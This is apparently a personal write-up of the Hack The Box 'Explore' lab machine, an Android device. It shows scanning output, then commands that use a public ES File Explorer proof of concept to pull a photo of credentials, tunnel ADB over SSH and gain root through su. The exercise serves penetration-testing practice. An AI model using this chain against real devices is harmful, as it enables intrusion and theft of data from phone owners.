Name: Explore
Release Date: 26 Jun 2021
Retire Date: 30 Oct 2021
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
JoshSH 00 days, 00 hours, 03 mins, 27 seconds
jkr 00 days, 00 hours, 18 mins, 56 seconds
Creator: bertolis
Pentest Workstation PDF: Explore.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.


SSH (TCP 2222), FREECIV/ADB (TCP 5555), and HTTP Bukkit JSONAPI (TCP 59777) are the major ports we need to look at right now. Gobuster found several pages and directories that could be interesting.


gobuster dir -w /usr/share/dirb/wordlists/big.txt -u

└─$ gobuster dir -u -w /usr/share/dirb/wordlists/big.txt -o gobusterExplore.out           
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/01/17 08:41:32 Starting gobuster in directory enumeration mode
/acct                 (Status: 301) [Size: 65] [--> /acct/]
/bin                  (Status: 301) [Size: 63] [--> /bin/] 
/cache                (Status: 301) [Size: 67] [--> /cache/]
/config               (Status: 301) [Size: 69] [--> /config/]
/d                    (Status: 301) [Size: 59] [--> /d/]     
/data                 (Status: 301) [Size: 65] [--> /data/]  
/dev                  (Status: 301) [Size: 63] [--> /dev/]   
/etc                  (Status: 301) [Size: 63] [--> /etc/]   
/init                 (Status: 403) [Size: 31]               
/lib                  (Status: 301) [Size: 63] [--> /lib/]   
/mnt                  (Status: 301) [Size: 63] [--> /mnt/]   
/oem                  (Status: 301) [Size: 63] [--> /oem/]   
/proc                 (Status: 301) [Size: 65] [--> /proc/]  
/product              (Status: 301) [Size: 71] [--> /product/]
/sbin                 (Status: 301) [Size: 65] [--> /sbin/]   
/storage              (Status: 301) [Size: 71] [--> /storage/]
/sys                  (Status: 301) [Size: 63] [--> /sys/]    
/system               (Status: 301) [Size: 69] [--> /system/] 
/vendor               (Status: 301) [Size: 69] [--> /vendor/] 
2022/01/17 08:56:26 Finished

Researching ports 5555 and 59777, we can discover ES File Explorer along with its information and vulnerabilities. Two great resources for those two ports are:





Clone the exploit repo and check the README.md file to see what commands can be run. To save time, the ones we need are:


python3 poc.py --ip= -c listPics

and then

python3 poc.py --ip= -g /storage/emulated/0/DCIM/creds.jpg

Open the creds.jpg file and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note..... (PASSWORD MANAGERS!!! I'm better now). At least it's a halfway decent password, so there's that.



This is obviously a phone, in case the ES File Explorer wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which, if I recall, is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly AND we still have to find the user.txt flag. Time to go old school and enumerate manually. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it!


:/sdcard $ cat user.txt


Now, if you recall, port 5555 (ADB) was filtered, but what if we could use port tunneling to access it?


ssh -L 5555:localhost:5555 kristi@ -p 2222


Then, we "should" be able to use adb connect to get another shell, hopefully as root, but we'll see.


└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555

└─$ adb devices      
List of devices attached
emulator-5554   device
localhost:5555  device


Notice there are two "devices" attached. We need to specify which one we want adb to open the shell on.


└─$ adb -s localhost:5555 shell
x86_64:/ $ whoami
x86_64:/ $ su
:/ # whoami

Gotcha!!! Now we search for root.txt and this phone will be toast.


:/ # find / -name root.txt

:/data # cat root.txt


This was a completely different style of box/phone/thing....  But hey, another one down!